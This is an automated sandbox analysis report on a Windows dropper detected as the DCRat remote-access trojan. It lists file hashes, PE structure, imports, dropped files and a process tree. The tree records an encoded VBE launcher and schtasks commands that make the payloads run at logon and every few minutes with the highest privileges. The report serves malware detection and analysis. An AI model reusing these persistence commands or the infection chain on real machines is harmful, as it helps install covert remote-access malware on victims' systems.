              SSDEEP:6:GogwqK+NkLzWbHa/JUrFnBaORbM5nCMQz55s:GoBMCzWLauhBaORbQCMQNm
              MD5:8C47B37F0C9C6A607A8C2F8A92447036
              SHA1:3E6D7C7B3C3EC75F43D021EDF32F956F69AE5BE2
              SHA-256:563E80EDF8D73BC8FEFFFAE2A15FE9B2E92CEBB70C1E4507F421D4717952396D
              SHA-512:CBEDFFC1EE2F9B0560F2C39CB5F3B58D36AF06049D73B4FB5B5759E5DBCE63DC0E285C6856DE97B1824C882B9559DFAF111F04A77E61A80C44B6DF8287E0BC4D
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              Preview:#@~^twAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=zAbxUl\./Ji2sm"pjkid5bS:X/n*qsfGR(lDJSPTS,0CVknhjkAAA==^#~@.
              Process:C:\winSaves\fontsavesbroker.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):847872
              Entropy (8bit):6.080640642128486
              Encrypted:false
              SSDEEP:12288:8DTblYiD2UQavcM7pokcJJgyJrQEi20MeIl2JPpTK8R+TBP:4lYiD2UQCmkcJJ1iul2LTK8R+TBP
              MD5:173D5AC0A5C8FBF0A3990DFD33A329B5
              SHA1:479DD85A5921FA5D0DE0CD164FCC626791634ADE
              SHA-256:57FB0DEF3DF546AA3FC26CA768A66BB79F120BACE0ED7474E0C65003CF96DC12
              SHA-512:558CE6EB0ACA76EF003DE2A19ECE63F4B5854BF927DECCBBF939A4ABE4F8233B155D839892837261FAC2B2A71B33BA25D456F776144C3980F076ECD9A64D7BEE
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 88%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\Desktop\j0GOUGjcJD.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):33
              Entropy (8bit):4.124256907946324
              Encrypted:false
              SSDEEP:3:I5D2EMbLwEa4i:I5M0V
              MD5:91129DA897A4DD387D2DB9F93EBB8260
              SHA1:6784E5F5F49A1435337A2D6DC01AFE5DD76DA0A8
              SHA-256:A8B4D980F24E850CC47C9E427F4C6582AF71D71C1D31206011A8489DCC4D158A
              SHA-512:09BFCDA2F68E2A2689FC7AA0CE2EC06492CF8475D4B874B59FF02DCB105C6AB714C8FFE99B4FF344BAE692A4A1018C08CEDF388B0E10D6423C5A9EB2D9CCBABF
              Malicious:false
              Preview:"C:\winSaves\fontsavesbroker.exe"
              Process:C:\winSaves\fontsavesbroker.exe
              File Type:ASCII text, with very long lines (680), with no line terminators
              Category:dropped
              Size (bytes):680
              Entropy (8bit):5.897445668605952
              Encrypted:false
              SSDEEP:12:wgBmm/UmhFhZ6ojyn67J7L0e/M+Cdi/uv29eq9vjxQLPYTmt2zCI6fzaja:VQgUmj/htJ/0e/KdnvgvC7YTo86fzaW
              MD5:3A6A92C38B183CE031ADFA29BA644CDB
              SHA1:CF1B210C776ADD890A5EC07E5D1A199E5F25FC19
              SHA-256:6AEC6ADBE80CEA4847E64111C9E8115766737C608D3840F8C35864195B4EA6F2
              SHA-512:6D5B659B36E9E39FD99DCB565B746EDC0A6E418C99E7C2EB3468473B4ADF62C58C33E09FEE42BE6C6C6D9FFAFC4504131A50F4D690848C396336D72EA7D83434
              Malicious:false
              Preview:
              Process:C:\Users\user\Desktop\j0GOUGjcJD.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):847872
              Entropy (8bit):6.080640642128486
              Encrypted:false
              SSDEEP:12288:8DTblYiD2UQavcM7pokcJJgyJrQEi20MeIl2JPpTK8R+TBP:4lYiD2UQCmkcJJ1iul2LTK8R+TBP
              MD5:173D5AC0A5C8FBF0A3990DFD33A329B5
              SHA1:479DD85A5921FA5D0DE0CD164FCC626791634ADE
              SHA-256:57FB0DEF3DF546AA3FC26CA768A66BB79F120BACE0ED7474E0C65003CF96DC12
              SHA-512:558CE6EB0ACA76EF003DE2A19ECE63F4B5854BF927DECCBBF939A4ABE4F8233B155D839892837261FAC2B2A71B33BA25D456F776144C3980F076ECD9A64D7BEE
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 88%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\System32\w32tm.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):151
              Entropy (8bit):4.845173476047131
              Encrypted:false
              SSDEEP:3:VLV993J+miJWEoJ8FXyUVKXz5/Ec/I6vo7Y5qvj:Vx993DEUEVwtAFz
              MD5:9842872DC799B57C26CFC05FA95259F6
              SHA1:B47344BEAD5DCBE291BCF2A8C75E63AD65EC1D39
              SHA-256:0442B9684070AADBD966116A799102E741E0F8B722DCC69B02406FC1B49C7F45
              SHA-512:692C8D8E625229EFF6C188A57E2713C0F43ABAE9C5783630211B67C022A4AF1B09F081625D60C7E00DE1DA79404B2EBAB3CC33CAD3CA3CB46F4F5B9811AD7E97
              Malicious:false
              Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 02/10/2024 13:39:20..13:39:20, error: 0x80072746.13:39:25, error: 0x80072746.
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.305118116386212
              TrID:
              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              • Win32 Executable (generic) a (10002005/4) 49.97%
              • Generic Win/DOS Executable (2004/3) 0.01%
              • DOS Executable Generic (2002/1) 0.01%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:j0GOUGjcJD.exe
              File size:1'141'873 bytes
              MD5:2b577aea211c0031d052f521c6d5c0ec
              SHA1:7cf36171d6c2dae4646132b6ebafd00bf6a38892
              SHA256:acbf2913aa4a2385d29179f5a9c0add2fff6bb34adab4669d02793a5c1317cc9
              SHA512:c6d925af572352dc833168d03917ded04d0f932ef7e92c398287b9945eb2edf8bb6073c346b09ae1fe0197134b5bbdda5bc8b241541d5f88f8161174700731f6
              SSDEEP:24576:B2G/nvxW3Wfn9lYiD2UQCmkcJJ1iul2LTK8R+TBPu:BbA3e9l5Dvmkqi02eW
              TLSH:9F3549017E448A12F0191673C2EF851847B4EC512BA6E32B7EB9777E6512393BD1CACB
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..
              Icon Hash:072b44052b970e0d
              Entrypoint:0x41ec40
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:fcf1390e9ce472c7270447fc5c61a0c1
              Instruction
              call 00007FECA4EBF289h
              jmp 00007FECA4EBEC9Dh
              cmp ecx, dword ptr [0043E668h]
              jne 00007FECA4EBEE15h
              ret
              jmp 00007FECA4EBF40Eh
              int3
              int3
              int3
              int3
              int3
              push ebp
              mov ebp, esp
              push esi
              push dword ptr [ebp+08h]
              mov esi, ecx
              call 00007FECA4EB1BA7h
              mov dword ptr [esi], 00435580h
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              and dword ptr [ecx+04h], 00000000h
              mov eax, ecx
              and dword ptr [ecx+08h], 00000000h
              mov dword ptr [ecx+04h], 00435588h
              mov dword ptr [ecx], 00435580h
              ret
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              lea eax, dword ptr [ecx+04h]
              mov dword ptr [ecx], 00435568h
              push eax
              call 00007FECA4EC1FADh
              pop ecx
              ret
              push ebp
              mov ebp, esp
              sub esp, 0Ch
              lea ecx, dword ptr [ebp-0Ch]
              call 00007FECA4EB1B3Eh
              push 0043B704h
              lea eax, dword ptr [ebp-0Ch]
              push eax
              call 00007FECA4EC16C2h
              int3
              push ebp
              mov ebp, esp
              sub esp, 0Ch
              lea ecx, dword ptr [ebp-0Ch]
              call 00007FECA4EBEDB4h
              push 0043B91Ch
              lea eax, dword ptr [ebp-0Ch]
              push eax
              call 00007FECA4EC16A5h
              int3
              jmp 00007FECA4EC36F3h
              jmp dword ptr [00433260h]
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              push 00421EB0h
              push dword ptr fs:[00000000h]
              Programming Language:
              • [ C ] VS2008 SP1 build 30729
              • [IMP] VS2008 SP1 build 30729
              • [C++] VS2015 UPD3.1 build 24215
              • [EXP] VS2015 UPD3.1 build 24215
              • [RES] VS2015 UPD3 build 24213
              • [LNK] VS2015 UPD3.1 build 24215
              Name | Virtual Address | Virtual Size | Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3c820 | 0x34 | .rdata
              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3c854 | 0x3c | .rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x63000 | 0x8474 | .rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6c000 | 0x2268 | .reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3aac0 | 0x54 | .rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x35508 | 0x40 | .rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x260 | .rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3bdc4 | 0x120 | .rdata
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
              .text | 0x1000 | 0x310ea | 0x31200 | c5bf61bbedb6ad471e9dc6266398e965 | False | 0.583959526081425 | data | 6.708075396341128 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata | 0x33000 | 0xa612 | 0xa800 | 7980b588d5b28128a2f3c36cabe2ce98 | False | 0.45284598214285715 | data | 5.221742709250668 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data | 0x3e000 | 0x23728 | 0x1000 | 201530c9e56f172adf2473053298d48f | False | 0.36767578125 | data | 3.7088186669877685 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .didat | 0x62000 | 0x188 | 0x200 | c5d41d8f254f69e567595ab94266cfdc | False | 0.4453125 | data | 3.2982538067961342 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc | 0x63000 | 0x8474 | 0x8600 | f0fb3cb5a18258d71172e80f538390ff | False | 0.43234025186567165 | data | 4.620184056545728 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc | 0x6c000 | 0x2268 | 0x2400 | c7a942b723cb29d9c02f7c611b544b50 | False | 0.7681206597222222 | data | 6.5548620101740545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
              PNG | 0x63584 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
              PNG | 0x640cc | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
              RT_ICON | 0x65678 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | | | 0.3129432624113475
              RT_ICON | 0x65ae0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.2129455909943715
              RT_ICON | 0x66b88 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | | | 0.16981327800829876
              RT_DIALOG | 0x69130 | 0x286 | data | English | United States | 0.5092879256965944
              RT_DIALOG | 0x693b8 | 0x13a | data | English | United States | 0.60828025477707
              RT_DIALOG | 0x694f4 | 0xec | data | English | United States | 0.6991525423728814
              RT_DIALOG | 0x695e0 | 0x12e | data | English | United States | 0.5927152317880795
              RT_DIALOG | 0x69710 | 0x338 | data | English | United States | 0.45145631067961167
              RT_DIALOG | 0x69a48 | 0x252 | data | English | United States | 0.5757575757575758
              RT_STRING | 0x69c9c | 0x1e2 | data | English | United States | 0.3900414937759336
              RT_STRING | 0x69e80 | 0x1cc | data | English | United States | 0.4282608695652174
              RT_STRING | 0x6a04c | 0x1b8 | data | English | United States | 0.45681818181818185
              RT_STRING | 0x6a204 | 0x146 | data | English | United States | 0.5153374233128835
              RT_STRING | 0x6a34c | 0x446 | data | English | United States | 0.340036563071298
              RT_STRING | 0x6a794 | 0x166 | data | English | United States | 0.49162011173184356
              RT_STRING | 0x6a8fc | 0x152 | data | English | United States | 0.5059171597633136
              RT_STRING | 0x6aa50 | 0x10a | data | English | United States | 0.49624060150375937
              RT_STRING | 0x6ab5c | 0xbc | data | English | United States | 0.6329787234042553
              RT_STRING | 0x6ac18 | 0xd6 | data | English | United States | 0.5747663551401869
              RT_GROUP_ICON | 0x6acf0 | 0x30 | data | | | 0.8125
              RT_MANIFEST | 0x6ad20 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
              DLL | Import
              KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
              gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
              Language of compilation system | Country where language is spoken | Map
              English | United States |
              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Oct 2, 2024 17:54:41.180674076 CEST | 53 | 55961 | 1.1.1.1 | 192.168.2.4
              Oct 2, 2024 17:54:55.774367094 CEST | 53 | 56531 | 1.1.1.1 | 192.168.2.4

              Target ID:0
              Start time:11:53:53
              Start date:02/10/2024
              Path:C:\Users\user\Desktop\j0GOUGjcJD.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\j0GOUGjcJD.exe"
              Imagebase:0x4d0000
              File size:1'141'873 bytes
              MD5 hash:2B577AEA211C0031D052F521C6D5C0EC
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              Target ID:1
              Start time:11:53:54
              Start date:02/10/2024
              Path:C:\Windows\SysWOW64\wscript.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\WScript.exe" "C:\winSaves\0VySiddKAXOECI1ul.vbe"
              Imagebase:0x7e0000
              File size:147'456 bytes
              MD5 hash:FF00E0480075B095948000BDC66E81F0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:2
              Start time:11:54:04
              Start date:02/10/2024
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\system32\cmd.exe /c ""C:\winSaves\UEmczQViUsQALT5sK5Im3o.bat" "
              Imagebase:0x240000
              File size:236'544 bytes
              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:3
              Start time:11:54:04
              Start date:02/10/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7699e0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:4
              Start time:11:54:04
              Start date:02/10/2024
              Path:C:\winSaves\fontsavesbroker.exe
              Wow64 process (32bit):false
              Commandline:"C:\winSaves\fontsavesbroker.exe"
              Imagebase:0xa20000
              File size:847'872 bytes
              MD5 hash:173D5AC0A5C8FBF0A3990DFD33A329B5
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1802058996.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1802058996.0000000002EE3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Antivirus matches:
              • Detection: 100%, Avira
              • Detection: 100%, Joe Sandbox ML
              • Detection: 88%, ReversingLabs
              Reputation:low
              Has exited:true

              Target ID:5
              Start time:11:54:05
              Start date:02/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\Windows\Cursors\SearchApp.exe'" /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:6
              Start time:11:54:05
              Start date:02/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Windows\Cursors\SearchApp.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:7
              Start time:11:54:05
              Start date:02/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Windows\Cursors\SearchApp.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:8
              Start time:11:54:05
              Start date:02/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "TGdhCspOsuwHWHVRmOneCNdUUqTST" /sc MINUTE /mo 11 /tr "'C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe'" /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:9
              Start time:11:54:05
              Start date:02/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "TGdhCspOsuwHWHVRmOneCNdUUqTS" /sc ONLOGON /tr "'C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:10
              Start time:11:54:05
              Start date:02/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "TGdhCspOsuwHWHVRmOneCNdUUqTST" /sc MINUTE /mo 13 /tr "'C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:11
              Start time:11:54:06
              Start date:02/10/2024
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vxPvY9xhrB.bat"
              Imagebase:0x7ff7f4c20000
              File size:289'792 bytes
              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:12
              Start time:11:54:06
              Start date:02/10/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7699e0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:13
              Start time:11:54:06
              Start date:02/10/2024
              Path:C:\Windows\System32\w32tm.exe
              Wow64 process (32bit):false
              Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
              Imagebase:0x7ff68f970000
              File size:108'032 bytes
              MD5 hash:81A82132737224D324A3E8DA993E2FB5
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:16
              Start time:11:54:06
              Start date:02/10/2024
              Path:C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe
              Wow64 process (32bit):false
              Commandline:C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe
              Imagebase:0xb30000
              File size:847'872 bytes
              MD5 hash:173D5AC0A5C8FBF0A3990DFD33A329B5
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.1890656655.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.1890656655.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.1890656655.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Antivirus matches:
              • Detection: 100%, Avira
              • Detection: 100%, Joe Sandbox ML
              • Detection: 88%, ReversingLabs
              Has exited:true

              Target ID:17
              Start time:11:54:07
              Start date:02/10/2024
              Path:C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe
              Wow64 process (32bit):false
              Commandline:C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe
              Imagebase:0xc80000
              File size:847'872 bytes
              MD5 hash:173D5AC0A5C8FBF0A3990DFD33A329B5
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.1891516685.000000000303E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.1891516685.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Has exited:true

              Target ID:19
              Start time:11:54:11
              Start date:02/10/2024
              Path:C:\winSaves\fontsavesbroker.exe
              Wow64 process (32bit):false
              Commandline:"C:\winSaves\fontsavesbroker.exe"
              Imagebase:0x5c0000
              File size:847'872 bytes
              MD5 hash:173D5AC0A5C8FBF0A3990DFD33A329B5
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000013.00000002.1933324919.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000013.00000002.1933324919.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Has exited:true


                Execution Graph

                Execution Coverage:9.8%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:9.2%
                Total number of Nodes:1506
                Total number of Limit Nodes:25
